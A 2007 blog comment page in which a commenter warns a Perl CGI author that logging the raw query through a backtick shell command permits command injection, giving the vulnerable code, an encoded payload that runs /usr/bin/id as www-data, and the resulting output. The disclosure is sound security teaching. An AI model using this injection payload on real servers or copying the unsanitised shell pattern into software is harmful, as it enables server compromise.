You are not currently logged in. If you do not have a user account then please consider creating one and logging in before you post your comment. This will allow you to track replies to your comment, and take part in the site much more freely.

To add your comment, fill in all the boxes below and then preview it to make sure you're happy with the way that it looks.

This is the comment you were replying to, attached to the weblog web locate

#2 Re: web locate Posted by Steve (62.30.xx.xx) on Fri 16 Feb 2007 at 22:34 Congratulations - you've just allowed remote users to execute arbitary commands upon your server..! Although you delete non-alphanumeric characters before executing your locate command you do not do so before logging. Consider this code: if(param){ my $word = param('query'); `echo \'$word\' >> search.log`; ... } Now consider the following query string: word=test'%0d;/usr/bin/id%3E/tmp/foo This decodes to: test' ;/usr/bin/id>/tmp/foo Which together becomes: echo 'test' /usr/bin/id>/tmp/foo >> search.log Leaving: skx@mine:~/cvs/yawns$ ls /tmp/fof^M -l -rw-r--r-- 1 www-data www-data 54 2007-02-16 22:30 /tmp/fof? skx@mine:~/cvs/yawns$ cat /tmp/fof^M uid=33(www-data) gid=33(www-data) groups=33(www-data) Suprise! Steve

Username:	Anonymous
Title:
Your Comment:
Posting Format:	BBCode HTML Text Plain Text Textile

Inappropriate comments will be removed.

Username:

Password:

[ Advanced Login ]

Register Account